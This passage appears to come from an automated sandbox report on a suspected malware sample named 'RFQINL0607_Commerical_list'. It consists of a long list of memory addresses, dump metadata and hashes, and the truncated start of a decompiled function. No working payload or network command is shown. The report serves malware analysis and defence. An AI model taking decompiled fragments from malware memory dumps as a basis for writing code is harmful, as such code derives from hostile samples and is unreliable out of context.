                                                                                                                                                                                  0x3335cd68
                                                                                                                                                                                  0x3335cd6b
                                                                                                                                                                                  0x3335cd6e
                                                                                                                                                                                  0x3335cd70
                                                                                                                                                                                  0x3335cd73
                                                                                                                                                                                  0x3335cd73
                                                                                                                                                                                  0x3335cd7b
                                                                                                                                                                                  0x3335cd7e
                                                                                                                                                                                  0x3335cd81
                                                                                                                                                                                  0x3335cd86
                                                                                                                                                                                  0x3335cd88
                                                                                                                                                                                  0x3335cd8b
                                                                                                                                                                                  0x3335cd8d
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3335cd93
                                                                                                                                                                                  0x3335cd94
                                                                                                                                                                                  0x3335cd98
                                                                                                                                                                                  0x3335cd9a
                                                                                                                                                                                  0x3335cd9d
                                                                                                                                                                                  0x3335cda2
                                                                                                                                                                                  0x3335cda9
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3335cda9
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3335cdb0
                                                                                                                                                                                  0x3335cdb4
                                                                                                                                                                                  0x3335cd16
                                                                                                                                                                                  0x3335cd16
                                                                                                                                                                                  0x3335cd1a
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3335cd1a
                                                                                                                                                                                  0x3335cdba
                                                                                                                                                                                  0x3335cdbe
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3335cdc7
                                                                                                                                                                                  0x3335cdca
                                                                                                                                                                                  0x3335cddd
                                                                                                                                                                                  0x3335cde1
                                                                                                                                                                                  0x3335cdf0
                                                                                                                                                                                  0x3335cdf6
                                                                                                                                                                                  0x3335cdfb
                                                                                                                                                                                  0x3335cdfd
                                                                                                                                                                                  0x3335ccff
                                                                                                                                                                                  0x3335ccff
                                                                                                                                                                                  0x3335cd01
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3335cd01
                                                                                                                                                                                  0x3335ce03
                                                                                                                                                                                  0x3335ce07
                                                                                                                                                                                  0x3335ce0a
                                                                                                                                                                                  0x3335ce10
                                                                                                                                                                                  0x3335ce10
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3335ce0a
                                                                                                                                                                                  0x3335cde3
                                                                                                                                                                                  0x3335cde7
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3335cde7
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3335ce18
                                                                                                                                                                                  0x3335ce1c
                                                                                                                                                                                  0x3335ce2b
                                                                                                                                                                                  0x3335ce2f
                                                                                                                                                                                  0x3335ce32
                                                                                                                                                                                  0x3335ce1e
                                                                                                                                                                                  0x3335ce1e
                                                                                                                                                                                  0x3335ce22
                                                                                                                                                                                  0x3335ce22
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3335ce3b
                                                                                                                                                                                  0x3335ce3f
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3335ce4e
                                                                                                                                                                                  0x3335ce52
                                                                                                                                                                                  0x3335ce56
                                                                                                                                                                                  0x3335ce59
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3335ce5f
                                                                                                                                                                                  0x3335ce61
                                                                                                                                                                                  0x3335ce65
                                                                                                                                                                                  0x3335ce6a
                                                                                                                                                                                  0x3335ce6c
                                                                                                                                                                                  0x3335cedb
                                                                                                                                                                                  0x3335cedd
                                                                                                                                                                                  0x3335cee1
                                                                                                                                                                                  0x3335cee5
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3335cee5
                                                                                                                                                                                  0x3335ce74
                                                                                                                                                                                  0x3335ce7a
                                                                                                                                                                                  0x3335ce7e
                                                                                                                                                                                  0x3335ce84
                                                                                                                                                                                  0x3335cec5
                                                                                                                                                                                  0x3335cec5
                                                                                                                                                                                  0x3335cec7
                                                                                                                                                                                  0x3335cecb
                                                                                                                                                                                  0x3335cecb
                                                                                                                                                                                  0x3335cece
                                                                                                                                                                                  0x3335ced2
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3335ced2
                                                                                                                                                                                  0x3335ce86
                                                                                                                                                                                  0x3335ce94
                                                                                                                                                                                  0x3335ce98
                                                                                                                                                                                  0x3335ce9f
                                                                                                                                                                                  0x3335cea5
                                                                                                                                                                                  0x3335ceaa
                                                                                                                                                                                  0x3335ceae
                                                                                                                                                                                  0x3335ceb1
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3335ceb3
                                                                                                                                                                                  0x3335ceb4
                                                                                                                                                                                  0x3335ceba
                                                                                                                                                                                  0x3335cebd
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3335ceee
                                                                                                                                                                                  0x3335cef0
                                                                                                                                                                                  0x3335cef2
                                                                                                                                                                                  0x3335cef7
                                                                                                                                                                                  0x3335ce41
                                                                                                                                                                                  0x3335ce41
                                                                                                                                                                                  0x3335ce45
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3335ce45
                                                                                                                                                                                  0x3335cf01
                                                                                                                                                                                  0x3335cf04
                                                                                                                                                                                  0x3335cf09
                                                                                                                                                                                  0x3335cf0b
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3335cf11
                                                                                                                                                                                  0x3335cf17
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3335cf1d
                                                                                                                                                                                  0x3335cf20
                                                                                                                                                                                  0x3335cf22
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3335cf32
                                                                                                                                                                                  0x3335cf3e
                                                                                                                                                                                  0x3335cf45
                                                                                                                                                                                  0x3335cf4a
                                                                                                                                                                                  0x3335cf4c
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3335cf52
                                                                                                                                                                                  0x3335cf59
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3335cf62
                                                                                                                                                                                  0x3335cf66
                                                                                                                                                                                  0x3335cf6a
                                                                                                                                                                                  0x3335cf6c
                                                                                                                                                                                  0x3335cf6e
                                                                                                                                                                                  0x3335cf73
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3335cf79
                                                                                                                                                                                  0x3335cf81
                                                                                                                                                                                  0x3335cf9a
                                                                                                                                                                                  0x3335cf9d
                                                                                                                                                                                  0x3335cf83
                                                                                                                                                                                  0x3335cf83
                                                                                                                                                                                  0x3335cf8a
                                                                                                                                                                                  0x3335cf91
                                                                                                                                                                                  0x3335cf95
                                                                                                                                                                                  0x3335cf95
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3335cfa3
                                                                                                                                                                                  0x3335cfa7
                                                                                                                                                                                  0x3335cfab
                                                                                                                                                                                  0x3335cfb1
                                                                                                                                                                                  0x3335cfb2
                                                                                                                                                                                  0x3335cfb4
                                                                                                                                                                                  0x3335cfb9
                                                                                                                                                                                  0x3335cfbc
                                                                                                                                                                                  0x3335cfbe
                                                                                                                                                                                  0x3335cfc0
                                                                                                                                                                                  0x3335cfc7
                                                                                                                                                                                  0x3335cfc7
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3335cfcd
                                                                                                                                                                                  0x3335cfd1
                                                                                                                                                                                  0x3335cfd5
                                                                                                                                                                                  0x3335cfdb
                                                                                                                                                                                  0x3335cfdc
                                                                                                                                                                                  0x3335cfde
                                                                                                                                                                                  0x3335cfe3
                                                                                                                                                                                  0x3335cfe6
                                                                                                                                                                                  0x3335cfe8
                                                                                                                                                                                  0x3335cfea
                                                                                                                                                                                  0x3335cff0
                                                                                                                                                                                  0x3335cff6
                                                                                                                                                                                  0x3335cff8
                                                                                                                                                                                  0x3335cffb
                                                                                                                                                                                  0x3335cffb
                                                                                                                                                                                  0x3335cff6
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3335d001
                                                                                                                                                                                  0x3335d006
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3335d00c
                                                                                                                                                                                  0x3335d00c
                                                                                                                                                                                  0x3335d00c
                                                                                                                                                                                  0x3335d00f
                                                                                                                                                                                  0x3335d012
                                                                                                                                                                                  0x3335d014
                                                                                                                                                                                  0x3335d016
                                                                                                                                                                                  0x3335d018
                                                                                                                                                                                  0x3335d02a
                                                                                                                                                                                  0x3335d02d
                                                                                                                                                                                  0x3335d030
                                                                                                                                                                                  0x3335d033
                                                                                                                                                                                  0x3335d036
                                                                                                                                                                                  0x3335d03c
                                                                                                                                                                                  0x3335d03f
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3335d03f
                                                                                                                                                                                  0x3335d01d
                                                                                                                                                                                  0x3335d020
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3335d022
                                                                                                                                                                                  0x3335ccd9
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3335ccf0
                                                                                                                                                                                  0x3335cbdc
                                                                                                                                                                                  0x3335cbde
                                                                                                                                                                                  0x3335cbe1
                                                                                                                                                                                  0x3335cbe3
                                                                                                                                                                                  0x3335cc7d
                                                                                                                                                                                  0x3335cc7d
                                                                                                                                                                                  0x3335cc7f
                                                                                                                                                                                  0x3335cc94
                                                                                                                                                                                  0x3335cc94
                                                                                                                                                                                  0x3335cc9c
                                                                                                                                                                                  0x3335cc9c
                                                                                                                                                                                  0x3335cc9f
                                                                                                                                                                                  0x3335d2c8
                                                                                                                                                                                  0x3335d2cd
                                                                                                                                                                                  0x3335d2cd
                                                                                                                                                                                  0x3335d2d0
                                                                                                                                                                                  0x3335d2d0
                                                                                                                                                                                  0x3335d2d6
                                                                                                                                                                                  0x3335d33b
                                                                                                                                                                                  0x3335d33b
                                                                                                                                                                                  0x3335d33e
                                                                                                                                                                                  0x3335d33e
                                                                                                                                                                                  0x3335d344
                                                                                                                                                                                  0x3335d352
                                                                                                                                                                                  0x3335d354
                                                                                                                                                                                  0x3335d356
                                                                                                                                                                                  0x3335d35b
                                                                                                                                                                                  0x3335d3ef
                                                                                                                                                                                  0x3335d3ef
                                                                                                                                                                                  0x3335d3f6
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3335d3f6
                                                                                                                                                                                  0x3335d361
                                                                                                                                                                                  0x3335d366
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3335d36c
                                                                                                                                                                                  0x3335d36e
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3335d374
                                                                                                                                                                                  0x3335d378
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3335d37c
                                                                                                                                                                                  0x3335d382
                                                                                                                                                                                  0x3335d388
                                                                                                                                                                                  0x3335d38b
                                                                                                                                                                                  0x3335d38e
                                                                                                                                                                                  0x3335d391
                                                                                                                                                                                  0x3335d396
                                                                                                                                                                                  0x3335d396
                                                                                                                                                                                  0x3335d39e
                                                                                                                                                                                  0x3335d3a1
                                                                                                                                                                                  0x3335d3ab
                                                                                                                                                                                  0x3335d3ad
                                                                                                                                                                                  0x3335d3b0
                                                                                                                                                                                  0x3335d3b2
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3335d3b4
                                                                                                                                                                                  0x3335d3bc
                                                                                                                                                                                  0x3335d3c0
                                                                                                                                                                                  0x3335d3c5
                                                                                                                                                                                  0x3335d3cc
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3335d3cc
                                                                                                                                                                                  0x3335d3b2
                                                                                                                                                                                  0x3335d346
                                                                                                                                                                                  0x3335d34c
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3335d34c
                                                                                                                                                                                  0x3335d2d8
                                                                                                                                                                                  0x3335d2de
                                                                                                                                                                                  0x3335d2e8
                                                                                                                                                                                  0x3335d2e8
                                                                                                                                                                                  0x3335d2eb
                                                                                                                                                                                  0x3335d2ee
                                                                                                                                                                                  0x3335d2f2
                                                                                                                                                                                  0x3335d2f8
                                                                                                                                                                                  0x3335d2fe
                                                                                                                                                                                  0x3335d301
                                                                                                                                                                                  0x3335d304
                                                                                                                                                                                  0x3335d307
                                                                                                                                                                                  0x3335d30c
                                                                                                                                                                                  0x3335d30c
                                                                                                                                                                                  0x3335d31b
                                                                                                                                                                                  0x3335d321
                                                                                                                                                                                  0x3335d326
                                                                                                                                                                                  0x3335d32b
                                                                                                                                                                                  0x3335d32d
                                                                                                                                                                                  0x3335d332
                                                                                                                                                                                  0x3335d334
                                                                                                                                                                                  0x3335d336
                                                                                                                                                                                  0x3335d336
                                                                                                                                                                                  0x3335d332
                                                                                                                                                                                  0x3335d32b
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3335d2ee
                                                                                                                                                                                  0x3335d2e0
                                                                                                                                                                                  0x3335d2e6
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3335d2e6
                                                                                                                                                                                  0x3335cca5
                                                                                                                                                                                  0x3335cca5
                                                                                                                                                                                  0x3335cca8
                                                                                                                                                                                  0x3335d2c1
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3335d2c1
                                                                                                                                                                                  0x3335ccae
                                                                                                                                                                                  0x3335ccb1
                                                                                                                                                                                  0x3335ccbd
                                                                                                                                                                                  0x3335ccc2
                                                                                                                                                                                  0x3335ccc5
                                                                                                                                                                                  0x3335ccc9
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3335cccf
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3335cccf
                                                                                                                                                                                  0x3335ccb3
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3335ccb3
                                                                                                                                                                                  0x3335cc81
                                                                                                                                                                                  0x3335cc83
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3335cc88
                                                                                                                                                                                  0x3335cc8a
                                                                                                                                                                                  0x3335cc8c
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3335cc8c
                                                                                                                                                                                  0x3335cbe9
                                                                                                                                                                                  0x3335cbeb
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3335cbf4
                                                                                                                                                                                  0x3335cbf6
                                                                                                                                                                                  0x3335cbfc
                                                                                                                                                                                  0x3335cc03
                                                                                                                                                                                  0x3335cc0b
                                                                                                                                                                                  0x3335cc23
                                                                                                                                                                                  0x3335cc23
                                                                                                                                                                                  0x3335cc29
                                                                                                                                                                                  0x3335cc2f
                                                                                                                                                                                  0x3335cc36
                                                                                                                                                                                  0x3335cc44
                                                                                                                                                                                  0x3335cc47
                                                                                                                                                                                  0x3335cc5b
                                                                                                                                                                                  0x3335cc6a
                                                                                                                                                                                  0x3335cc6a
                                                                                                                                                                                  0x3335cc6d
                                                                                                                                                                                  0x3335cc6f
                                                                                                                                                                                  0x3335cc72
                                                                                                                                                                                  0x3335cc75
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3335cc75
                                                                                                                                                                                  0x3335cb90
                                                                                                                                                                                  0x3335cb2c
                                                                                                                                                                                  0x3335cb33
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3335cb33
                                                                                                                                                                                  0x3335cb1d
                                                                                                                                                                                  0x3335cb1d
                                                                                                                                                                                  0x3335cb1f
                                                                                                                                                                                  0x3335cb1f
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3335cb1f
                                                                                                                                                                                  0x3335c882
                                                                                                                                                                                  0x3335c886
                                                                                                                                                                                  0x3335c88e
                                                                                                                                                                                  0x3335caf2
                                                                                                                                                                                  0x3335caf7
                                                                                                                                                                                  0x3335cafa
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3335cb14
                                                                                                                                                                                  0x3335cb16
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3335cb16
                                                                                                                                                                                  0x3335c898
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3335c89e
                                                                                                                                                                                  0x3335c8a6
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3335c8b2
                                                                                                                                                                                  0x3335c8bc
                                                                                                                                                                                  0x3335caee
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3335c8cb
                                                                                                                                                                                  0x3335c8d5
                                                                                                                                                                                  0x3335c8d8
                                                                                                                                                                                  0x3335c8da
                                                                                                                                                                                  0x3335c8de
                                                                                                                                                                                  0x3335c8e0
                                                                                                                                                                                  0x3335c8e0
                                                                                                                                                                                  0x3335c8e6
                                                                                                                                                                                  0x3335c8ee
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3335c8f4
                                                                                                                                                                                  0x3335c8f9
                                                                                                                                                                                  0x3335cac6
                                                                                                                                                                                  0x3335cac9
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3335c90c
                                                                                                                                                                                  0x3335c90e
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3335c914
                                                                                                                                                                                  0x3335c91c
                                                                                                                                                                                  0x3335cad1
                                                                                                                                                                                  0x3335cad1
                                                                                                                                                                                  0x3335cad4
                                                                                                                                                                                  0x3335cadd
                                                                                                                                                                                  0x3335cae2
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3335cae4
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3335cae4
                                                                                                                                                                                  0x3335c90e
                                                                                                                                                                                  0x3335c8f9
                                                                                                                                                                                  0x3335cacf
                                                                                                                                                                                  0x3335cacf
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3335cacf
                                                                                                                                                                                  0x3335c8bc
                                                                                                                                                                                  0x3335c7af
                                                                                                                                                                                  0x3335c7b5
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3335c7b7
                                                                                                                                                                                  0x3335c7ba
                                                                                                                                                                                  0x3335c7c2
                                                                                                                                                                                  0x3335c7c2
                                                                                                                                                                                  0x3335c7bc
                                                                                                                                                                                  0x3335c7bc
                                                                                                                                                                                  0x3335c7bc
                                                                                                                                                                                  0x3335c7c4
                                                                                                                                                                                  0x3335c7c7
                                                                                                                                                                                  0x3335c7cb
                                                                                                                                                                                  0x3335c7d0
                                                                                                                                                                                  0x3335c7fc
                                                                                                                                                                                  0x3335c803
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3335c826
                                                                                                                                                                                  0x3335c826
                                                                                                                                                                                  0x3335c829
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3335c829
                                                                                                                                                                                  0x3335c7d7
                                                                                                                                                                                  0x3335c7dd
                                                                                                                                                                                  0x3335c927
                                                                                                                                                                                  0x3335c927
                                                                                                                                                                                  0x3335c92e
                                                                                                                                                                                  0x3335c938
                                                                                                                                                                                  0x3335c943
                                                                                                                                                                                  0x3335c947
                                                                                                                                                                                  0x3335c94c
                                                                                                                                                                                  0x3335c94f
                                                                                                                                                                                  0x3335c952
                                                                                                                                                                                  0x3335ca4a
                                                                                                                                                                                  0x3335ca4a
                                                                                                                                                                                  0x3335ca4f
                                                                                                                                                                                  0x3335ca4f
                                                                                                                                                                                  0x3335ca52
                                                                                                                                                                                  0x3335ca52
                                                                                                                                                                                  0x3335ca54
                                                                                                                                                                                  0x3335ca57
                                                                                                                                                                                  0x3335ca5d
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3335ca63
                                                                                                                                                                                  0x3335ca68
                                                                                                                                                                                  0x3335ca6b
                                                                                                                                                                                  0x3335ca71
                                                                                                                                                                                  0x3335ca73
                                                                                                                                                                                  0x3335ca78
                                                                                                                                                                                  0x3335ca7b
                                                                                                                                                                                  0x3335ca7e
                                                                                                                                                                                  0x3335ca81
                                                                                                                                                                                  0x3335ca88
                                                                                                                                                                                  0x3335ca88
                                                                                                                                                                                  0x3335ca83
                                                                                                                                                                                  0x3335ca83
                                                                                                                                                                                  0x3335ca83
                                                                                                                                                                                  0x3335ca8a
                                                                                                                                                                                  0x3335ca8d
                                                                                                                                                                                  0x3335ca90
                                                                                                                                                                                  0x3335ca97
                                                                                                                                                                                  0x3335ca97
                                                                                                                                                                                  0x3335ca92
                                                                                                                                                                                  0x3335ca92
                                                                                                                                                                                  0x3335ca92
                                                                                                                                                                                  0x3335ca99
                                                                                                                                                                                  0x3335ca9c
                                                                                                                                                                                  0x3335ca9f
                                                                                                                                                                                  0x3335caa4
                                                                                                                                                                                  0x3335caa4
                                                                                                                                                                                  0x3335caad
                                                                                                                                                                                  0x3335cab7
                                                                                                                                                                                  0x3335cab7
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3335ca71
                                                                                                                                                                                  0x3335c958
                                                                                                                                                                                  0x3335c95a
                                                                                                                                                                                  0x3335ca09
                                                                                                                                                                                  0x3335ca0c
                                                                                                                                                                                  0x3335ca0d
                                                                                                                                                                                  0x3335ca11
                                                                                                                                                                                  0x3335ca13
                                                                                                                                                                                  0x3335ca14
                                                                                                                                                                                  0x3335ca19
                                                                                                                                                                                  0x3335ca1b
                                                                                                                                                                                  0x3335ca24
                                                                                                                                                                                  0x3335ca27
                                                                                                                                                                                  0x3335ca2a
                                                                                                                                                                                  0x3335ca31
                                                                                                                                                                                  0x3335ca33
                                                                                                                                                                                  0x3335ca33
                                                                                                                                                                                  0x3335ca39
                                                                                                                                                                                  0x3335ca39
                                                                                                                                                                                  0x3335ca3c
                                                                                                                                                                                  0x3335ca40
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3335ca42
                                                                                                                                                                                  0x3335ca1d
                                                                                                                                                                                  0x3335ca1d
                                                                                                                                                                                  0x3335ca1d
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3335ca1b
                                                                                                                                                                                  0x3335c960
                                                                                                                                                                                  0x3335c967
                                                                                                                                                                                  0x3335c96e
                                                                                                                                                                                  0x3335c984
                                                                                                                                                                                  0x3335c989
                                                                                                                                                                                  0x3335c98b
                                                                                                                                                                                  0x3335c991
                                                                                                                                                                                  0x3335c993
                                                                                                                                                                                  0x3335c9b9
                                                                                                                                                                                  0x3335c9bb
                                                                                                                                                                                  0x3335c9c1
                                                                                                                                                                                  0x3335c9c3
                                                                                                                                                                                  0x3335c9db
                                                                                                                                                                                  0x3335c9dd
                                                                                                                                                                                  0x3335c9e0
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3335c9e0
                                                                                                                                                                                  0x3335c9c5
                                                                                                                                                                                  0x3335c9c8
                                                                                                                                                                                  0x3335c9ce
                                                                                                                                                                                  0x3335c9e5
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3335c9d0
                                                                                                                                                                                  0x3335c9d0
                                                                                                                                                                                  0x3335c9d5
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3335c9d5
                                                                                                                                                                                  0x3335c995
                                                                                                                                                                                  0x3335c995
                                                                                                                                                                                  0x3335c99c
                                                                                                                                                                                  0x3335c9ef
                                                                                                                                                                                  0x3335c9ef
                                                                                                                                                                                  0x3335c9f1
                                                                                                                                                                                  0x3335c9f2
                                                                                                                                                                                  0x3335c9f4
                                                                                                                                                                                  0x3335c9f6
                                                                                                                                                                                  0x3335c9f7
                                                                                                                                                                                  0x3335c9f9
                                                                                                                                                                                  0x3335c9fd
                                                                                                                                                                                  0x3335ca02
                                                                                                                                                                                  0x3335ca05
                                                                                                                                                                                  0x3335ca07
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3335ca07
                                                                                                                                                                                  0x3335c7f9
                                                                                                                                                                                  0x3335c7f9
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3335c7f9
                                                                                                                                                                                  0x3335c7dd
                                                                                                                                                                                  0x3335c7d0
                                                                                                                                                                                  0x3335c7b5
                                                                                                                                                                                  0x3335c77e
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3335c786
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3335c788
                                                                                                                                                                                  0x3335c788
                                                                                                                                                                                  0x3335c78d
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3335c78d
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3335d3fa
                                                                                                                                                                                  0x3335d3fa
                                                                                                                                                                                  0x3335d3fa
                                                                                                                                                                                  0x3335d3ff
                                                                                                                                                                                  0x3335d402
                                                                                                                                                                                  0x3335d40a
                                                                                                                                                                                  0x3335d40b
                                                                                                                                                                                  0x3335d40c
                                                                                                                                                                                  0x3335d41a
                                                                                                                                                                                  0x3335d41a

                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.11643698870.0000000033320000.00000040.00001000.00020000.00000000.sdmp, Offset: 33320000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.0000000033449000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.000000003344D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_33320000_RFQINL0607_Commerical_list.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: MUI
                                                                                                                                                                                  • API String ID: 0-1339004836
                                                                                                                                                                                  • Opcode ID: a79b3429f7cd993f1a11271f567bf87fa0b6321783d08ad9e45efa7a42d217b4
                                                                                                                                                                                  • Instruction ID: 0e52ae8a125a57380bd213d5e6b3f28296c000518a2f565d126cf60260627d88
                                                                                                                                                                                  • Opcode Fuzzy Hash: a79b3429f7cd993f1a11271f567bf87fa0b6321783d08ad9e45efa7a42d217b4
                                                                                                                                                                                  • Instruction Fuzzy Hash: 148249B9E403188FFB14CFA9C880BADB7B5FF48754F14C16AE859AB250DB349985CB50
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 3337B1E0 Relevance: 1.9, Strings: 1, Instructions: 629COMMONCrypto
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  C-Code - Quality: 86%
                                                                                                                                                                                  			E3337B1E0(signed int _a4, signed int _a8, signed int _a12, signed int _a16, intOrPtr _a20) {
				char _v8;
				signed int _v12;
				char _v20;
				signed int _v29;
				char _v30;
				signed short _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				char _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				void* __ebx;
				void* __ebp;
				signed int _t232;
				intOrPtr _t235;
				signed int _t236;
				signed int _t241;
				short* _t255;
				short* _t259;
				short* _t260;
				signed int _t261;
				signed int _t270;
				signed int _t273;
				signed int _t274;
				signed int _t275;
				signed int _t282;
				void* _t284;
				signed int _t299;
				intOrPtr _t311;
				intOrPtr _t319;
				signed int _t322;
				signed int _t324;
				signed int _t327;
				signed short* _t334;
				signed int _t339;
				signed int _t340;
				signed int _t341;
				signed int _t342;
				signed int _t343;
				intOrPtr _t344;
				signed int _t346;
				signed int _t350;
				signed int _t355;
				signed int _t356;
				intOrPtr _t357;
				signed int _t359;
				short* _t361;
				void* _t362;
				signed int _t368;
				signed int _t370;
				signed int _t372;
				signed int _t374;
				signed int _t375;
				signed short _t378;
				intOrPtr _t380;
				intOrPtr _t383;
				intOrPtr _t384;
				signed int _t388;
				signed int _t389;
				void* _t390;
				signed int _t392;
				intOrPtr _t397;
				signed int _t400;
				short* _t401;
				signed int _t402;
				short* _t403;
				signed int _t406;
				signed int _t408;
				void* _t409;
				signed int _t414;
				signed int _t415;
				void* _t416;
				void* _t417;
				signed int _t418;
				void* _t420;
				void* _t422;
				signed int _t424;
				signed int _t425;
				intOrPtr _t427;
				void* _t428;
				void* _t432;
				void* _t435;
				void* _t437;
				signed short _t438;
				intOrPtr _t441;
				signed int _t442;
				void* _t443;
				void* _t444;
				void* _t446;

				_push(0xfffffffe);
				_push(0x3342c5a8);
				_push(E3339AD20);
				_push( *[fs:0x0]);
				_t444 = _t443 - 0x54;
				_t232 =  *0x3344b370;
				_v12 = _v12 ^ _t232;
				_push(_t232 ^ _t442);
				 *[fs:0x0] =  &_v20;
				_v56 = 0;
				_v84 = 0;
				_v29 = 0;
				_v30 = 0;
				_t389 = _a12;
				if(_t389 == 0) {
					L120:
